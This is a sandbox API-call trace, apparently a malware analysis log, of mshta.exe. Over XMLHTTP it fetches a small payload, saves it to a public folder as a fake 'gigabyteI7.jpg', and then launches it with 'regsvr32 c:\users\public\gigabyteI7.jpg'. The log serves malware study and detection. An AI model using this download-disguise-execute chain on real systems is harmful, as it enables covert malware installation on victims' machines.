[0089.795] Stream:IUnknown:QueryInterface (in: This=0x254b320, riid=0x663b5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x399d7c | out: ppvObject=0x399d7c*=0x0) returned 0x80004002
[0089.795] Stream:IUnknown:QueryInterface (in: This=0x254b320, riid=0x663b5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x399d78 | out: ppvObject=0x399d78*=0x0) returned 0x80004002
[0089.795] Stream:IUnknown:QueryInterface (in: This=0x254b320, riid=0x663b5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399d74 | out: ppvObject=0x399d74*=0x254b320) returned 0x0
[0089.795] Stream:IUnknown:Release (This=0x254b320) returned 0x1
[0089.796] Stream:IDispatch:GetIDsOfNames (in: This=0x254b320, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399f1c*="open", cNames=0x1, lcid=0x409, rgDispId=0x399f40 | out: rgDispId=0x399f40*=10) returned 0x0
[0089.796] Stream:IUnknown:AddRef (This=0x254b320) returned 0x2
[0089.796] Stream:IDispatch:Invoke (in: This=0x254b320, dispIdMember=10, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9048, pExcepInfo=0x399ef8, puArgErr=0x399ef4 | out: pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9048*(varType=0x0, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0x29b43b0, varVal2=0x39a074), pExcepInfo=0x399ef8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399ef4*=0x254b320) returned 0x0
[0090.143] Stream:IUnknown:Release (This=0x254b320) returned 0x1
[0090.143] Stream:IDispatch:GetIDsOfNames (in: This=0x254b320, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399edc*="type", cNames=0x1, lcid=0x409, rgDispId=0x399f00 | out: rgDispId=0x399f00*=4) returned 0x0
[0090.143] Stream:IUnknown:AddRef (This=0x254b320) returned 0x2
[0090.143] Stream:IDispatch:Invoke (in: This=0x254b320, dispIdMember=4, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x399ea4*(rgvarg=([0]=0x29b9048*(varType=0x3, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0x1, varVal2=0x39a074)), rgdispidNamedArgs=([0]=0x399e9c*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x399eb8, puArgErr=0x399eb4 | out: pDispParams=0x399ea4*(rgvarg=([0]=0x29b9048*(varType=0x3, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0x1, varVal2=0x39a074)), rgdispidNamedArgs=([0]=0x399e9c*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x399eb8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399eb4*=0x254b320) returned 0x0
[0090.144] Stream:IUnknown:Release (This=0x254b320) returned 0x1
[0090.144] XMLHTTP:IDispatch:GetIDsOfNames (in: This=0x2da3a10, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399f1c*="responsebody", cNames=0x1, lcid=0x409, rgDispId=0x399f40 | out: rgDispId=0x399f40*=11) returned 0x0
[0090.144] XMLHTTP:IUnknown:AddRef (This=0x2da3a10) returned 0x2
[0090.144] XMLHTTP:IDispatch:Invoke (in: This=0x2da3a10, dispIdMember=11, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9038, pExcepInfo=0x399ef8, puArgErr=0x399ef4 | out: pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9038*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b6d88*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x1b6da0*, rgsabound=((cElements=0xcc, lLbound=0))), varVal2=0x0), pExcepInfo=0x399ef8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399ef4*=0x2da3a10) returned 0x0
[0090.153] XMLHTTP:IUnknown:Release (This=0x2da3a10) returned 0x1
[0090.153] Stream:IDispatch:GetIDsOfNames (in: This=0x254b320, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399ea4*="write", cNames=0x1, lcid=0x409, rgDispId=0x399ec8 | out: rgDispId=0x399ec8*=13) returned 0x0
[0090.153] Stream:IUnknown:AddRef (This=0x254b320) returned 0x2
[0090.153] Stream:IDispatch:Invoke (in: This=0x254b320, dispIdMember=13, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x399e6c*(rgvarg=([0]=0x399e10*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b6d88*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x1b6da0*, rgsabound=((cElements=0xcc, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x39a09c, pExcepInfo=0x399e80, puArgErr=0x399e7c | out: pDispParams=0x399e6c*(rgvarg=([0]=0x399e10*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b6d88*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x1b6da0*, rgsabound=((cElements=0xcc, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x39a09c*(varType=0x0, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0x29b43b0, varVal2=0x39a074), pExcepInfo=0x399e80*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399e7c*=0x254b320) returned 0x0
[0090.154] Stream:IUnknown:Release (This=0x254b320) returned 0x1
[0090.154] Stream:IDispatch:GetIDsOfNames (in: This=0x254b320, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399ea4*="savetofile", cNames=0x1, lcid=0x409, rgDispId=0x399ec8 | out: rgDispId=0x399ec8*=17) returned 0x0
[0090.154] Stream:IUnknown:AddRef (This=0x254b320) returned 0x2
[0090.155] Stream:IDispatch:Invoke (in: This=0x254b320, dispIdMember=17, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x399e6c*(rgvarg=([0]=0x399e10*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x399e20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="c:\\users\\public\\gigabyteI7.jpg" (normalized: "c:\\users\\public\\gigabytei7.jpg"), varVal2=0x29b8a00)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x39a09c, pExcepInfo=0x399e80, puArgErr=0x399e7c | out: pDispParams=0x399e6c*(rgvarg=([0]=0x399e10*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x399e20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="c:\\users\\public\\gigabyteI7.jpg", varVal2=0x29b8a00)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x39a09c*(varType=0x0, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0x29b43b0, varVal2=0x39a074), pExcepInfo=0x399e80*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399e7c*=0x254b320) returned 0x0
[0090.155] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f38, riid=0x6623b748*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399194 | out: ppvObject=0x399194*=0x29c9f38) returned 0x0
[0090.155] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f38, riid=0x6623b748*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3991e8 | out: ppvObject=0x3991e8*=0x29c9f38) returned 0x0
[0090.155] XMLHTTP:IUnknown:Release (This=0x29c9f38) returned 0x2
[0090.171] XMLHTTP:IUnknown:Release (This=0x29c9f38) returned 0x1
[0090.171] Stream:IUnknown:Release (This=0x254b320) returned 0x1
[0090.172] Stream:IDispatch:GetIDsOfNames (in: This=0x254b320, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399f1c*="close", cNames=0x1, lcid=0x409, rgDispId=0x399f40 | out: rgDispId=0x399f40*=11) returned 0x0
[0090.172] Stream:IUnknown:AddRef (This=0x254b320) returned 0x2
[0090.172] Stream:IDispatch:Invoke (in: This=0x254b320, dispIdMember=11, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9048, pExcepInfo=0x399ef8, puArgErr=0x399ef4 | out: pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29b4390, varVal2=0x0), pExcepInfo=0x399ef8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399ef4*=0x254b320) returned 0x0
[0090.174] Stream:IUnknown:Release (This=0x254b320) returned 0x1
[0090.174] GetCurrentThreadId () returned 0xe84
[0090.174] GetCurrentThreadId () returned 0xe84
[0090.174] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0090.175] IUnknown:Release (This=0x1525d8) returned 0x11
[0090.175] free (_Block=0x29bad38)
[0090.175] GetCurrentThreadId () returned 0xe84
[0090.175] GetCurrentThreadId () returned 0xe84
[0090.175] GetCurrentThreadId () returned 0xe84
[0090.175] GetCurrentThreadId () returned 0xe84
[0090.176] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0090.176] ??3@YAXPAX@Z () returned 0x1
[0090.176] IUnknown:Release (This=0x1525d8) returned 0xf
[0090.176] free (_Block=0x29cc180)
[0090.177] GetCurrentThreadId () returned 0xe84
[0090.177] GetCurrentThreadId () returned 0xe84
[0090.178] GetCurrentThreadId () returned 0xe84
[0090.178] _wcsicmp (_String1="window", _String2="window") returned 0
[0090.179] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.179] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.179] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.179] GetCurrentThreadId () returned 0xe84
[0090.179] GetCurrentThreadId () returned 0xe84
[0090.179] GetCurrentThreadId () returned 0xe84
[0090.180] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.180] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.180] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.180] GetCurrentThreadId () returned 0xe84
[0090.180] malloc (_Size=0x24) returned 0x29bad38
[0090.181] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0090.181] IUnknown:AddRef (This=0x1525d8) returned 0x12
[0090.181] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ccf4 | out: ppv=0x39ccf4*=0x1369d0) returned 0x0
[0090.181] IUnknown:Release (This=0x1369d0) returned 0x1
[0090.181] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39cd38 | out: ppv=0x39cd38*=0x1369d0) returned 0x0
[0090.181] IUnknown:Release (This=0x1369d0) returned 0x1
[0090.181] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39cd7c | out: ppv=0x39cd7c*=0x1369d0) returned 0x0
[0090.181] IUnknown:Release (This=0x1369d0) returned 0x1
[0090.181] GetCurrentThreadId () returned 0xe84
[0090.182] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.182] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.182] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.182] IsCharSpaceW (wch=0x67) returned 0
[0090.182] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.182] ??2@YAPAXI@Z () returned 0x29cc180
[0090.182] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.182] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.182] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.183] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.183] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.183] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.183] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.183] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.183] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0090.184] GetCurrentThreadId () returned 0xe84
[0090.184] malloc (_Size=0x24) returned 0x29bac98
[0090.184] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0090.184] IUnknown:AddRef (This=0x1525d8) returned 0x15
[0090.185] ??2@YAPAXI@Z () returned 0x29bfa70
[0090.185] malloc (_Size=0x804) returned 0x29bd778
[0090.185] ??2@YAPAXI@Z () returned 0x29bfa98
[0090.185] ??3@YAXPAX@Z () returned 0x1
[0090.185] ??2@YAPAXI@Z () returned 0x29bcac8
[0090.186] free (_Block=0x29bd778)
[0090.186] ??3@YAXPAX@Z () returned 0x1
[0090.186] free (_Block=0x29be098)
[0090.186] free (_Block=0x29b5b78)
[0090.186] free (_Block=0x29bdf88)
[0090.186] ??2@YAPAXI@Z () returned 0x29bfa70
[0090.186] ??2@YAPAXI@Z () returned 0x29bfaa8
[0090.186] ??2@YAPAXI@Z () returned 0x29bfb28
[0090.186] ??2@YAPAXI@Z () returned 0x29bfb70
[0090.186] malloc (_Size=0x40) returned 0x29b5b78
[0090.186] malloc (_Size=0x104) returned 0x29b5bc0
[0090.186] CLSIDFromProgIDEx (in: lpszProgID="wscript.shell", lpclsid=0x399dec | out: lpclsid=0x399dec*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0090.190] SysStringLen (param_1=0x0) returned 0x0
[0090.190] CoGetClassObject (in: rclsid=0x399dec*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x663b087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x399de0 | out: ppv=0x399de0*=0x29c9f50) returned 0x0
[0090.202] malloc (_Size=0x80) returned 0x5fe4f8
[0090.202] GetVersionExA (in: lpVersionInformation=0x3989c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77a0e026, dwPlatformId=0x76ccf761, szCSDVersion="x\x8a9") | out: lpVersionInformation=0x3989c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0090.202] GetUserDefaultLCID () returned 0x409
[0090.203] DllGetClassObject (in: rclsid=0x13fb64*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x399a90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x399148 | out: ppv=0x399148*=0x29c9f50) returned 0x0
[0090.203] ??2@YAPAXI@Z () returned 0x29c9f50
[0090.203] WshShell:IUnknown:AddRef (This=0x29c9f50) returned 0x2
[0090.203] WshShell:IUnknown:Release (This=0x29c9f50) returned 0x1
[0090.203] WshShell:IUnknown:QueryInterface (in: This=0x29c9f50, riid=0x663b087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399d0c | out: ppvObject=0x399d0c*=0x29c9f50) returned 0x0
[0090.203] WshShell:IUnknown:Release (This=0x29c9f50) returned 0x1
[0090.204] ??2@YAPAXI@Z () returned 0x29bfbe0
[0090.204] lstrlenA (lpString="\\wscript.exe") returned 12
[0090.204] lstrlenA (lpString="C:\\Windows\\SysWOW64\\mshta.exe") returned 29
[0090.204] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\wscript.exe") returned -1
[0090.204] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\cscript.exe") returned -1
[0090.204] ??3@YAXPAX@Z () returned 0xb0001
[0090.204] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x399dec | out: lpclsid=0x399dec*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
[0090.213] SysStringLen (param_1=0x0) returned 0x0
[0090.213] CoGetClassObject (in: rclsid=0x399dec*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x663b087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x399de0 | out: ppv=0x399de0*=0x29ca780) returned 0x0
[0090.221] FileSystemObject:IUnknown:QueryInterface (in: This=0x29ca780, riid=0x663b7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x399ddc | out: ppvObject=0x399ddc*=0x0) returned 0x80004002
[0090.221] FileSystemObject:IClassFactory:CreateInstance (in: This=0x29ca780, pUnkOuter=0x0, riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399de4 | out: ppvObject=0x399de4*=0x29ca7a0) returned 0x0
[0090.221] FileSystemObject:IUnknown:Release (This=0x29ca780) returned 0x0
[0090.221] FileSystemObject:IUnknown:QueryInterface (in: This=0x29ca7a0, riid=0x663b5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x399d98 | out: ppvObject=0x399d98*=0x0) returned 0x80004002
[0090.221] FileSystemObject:IUnknown:QueryInterface (in: This=0x29ca7a0, riid=0x663b5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x399d84 | out: ppvObject=0x399d84*=0x0) returned 0x80004002
[0090.221] FileSystemObject:IUnknown:QueryInterface (in: This=0x29ca7a0, riid=0x663b55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x399d80 | out: ppvObject=0x399d80*=0x0) returned 0x80004002
[0090.221] FileSystemObject:IUnknown:QueryInterface (in: This=0x29ca7a0, riid=0x663b5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x399d7c | out: ppvObject=0x399d7c*=0x0) returned 0x80004002
[0090.221] FileSystemObject:IUnknown:QueryInterface (in: This=0x29ca7a0, riid=0x663b5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x399d78 | out: ppvObject=0x399d78*=0x0) returned 0x80004002
[0090.221] FileSystemObject:IUnknown:QueryInterface (in: This=0x29ca7a0, riid=0x663b5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399d74 | out: ppvObject=0x399d74*=0x29ca7a0) returned 0x0
[0090.221] FileSystemObject:IUnknown:Release (This=0x29ca7a0) returned 0x1
[0090.221] LoadRegTypeLib (in: rguid=0x665214bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x399e0c*=0x0 | out: pptlib=0x399e0c*=0x1bba88) returned 0x0
[0090.231] ITypeLib:GetTypeInfoOfGuid (in: This=0x1bba88, GUID=0x665214cc, ppTInfo=0x399df0 | out: ppTInfo=0x399df0*=0x1b717c) returned 0x0
[0090.231] ITypeInfo:GetRefTypeOfImplType (in: This=0x1b717c, index=0xffffffff, pRefType=0x399de4 | out: pRefType=0x399de4*=0xfffffffe) returned 0x0
[0090.231] ITypeInfo:GetRefTypeInfo (in: This=0x1b717c, hreftype=0xfffffffe, ppTInfo=0x6653501c | out: ppTInfo=0x6653501c*=0x1b71a8) returned 0x0
[0090.231] IUnknown:Release (This=0x1b717c) returned 0x1
[0090.231] IUnknown:Release (This=0x1bba88) returned 0x1
[0090.231] IUnknown:AddRef (This=0x1b71a8) returned 0x2
[0090.231] ITypeInfo:LocalGetIDsOfNames (This=0x1b71a8) returned 0x0
[0090.232] IUnknown:Release (This=0x1b71a8) returned 0x1
[0090.232] IUnknown:AddRef (This=0x1b71a8) returned 0x2
[0090.232] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0090.232] ITypeInfo:LocalInvoke (This=0x1b71a8) returned 0x0
[0090.233] ExpandEnvironmentStringsW (in: lpSrc="regsvr32 c:\\users\\public\\gigabyteI7.jpg", lpDst=0x3992fc, nSize=0x400 | out: lpDst="regsvr32 c:\\users\\public\\gigabyteI7.jpg") returned 0x28
[0090.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75cb0000
[0090.234] GetProcAddress (hModule=0x75cb0000, lpProcName="ShellExecuteExW") returned 0x75cd1e46
[0090.234] ShellExecuteExW (in: pExecInfo=0x399ac8*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="regsvr32", lpParameters="c:\\users\\public\\gigabyteI7.jpg", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x399ac8*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="regsvr32", lpParameters="c:\\users\\public\\gigabyteI7.jpg", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1
[0090.263] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0090.263] KillTimer (hWnd=0x1034a, uIDEvent=0x1000) returned 1
[0090.263] IUnknown:AddRef (This=0x13c184) returned 0x3
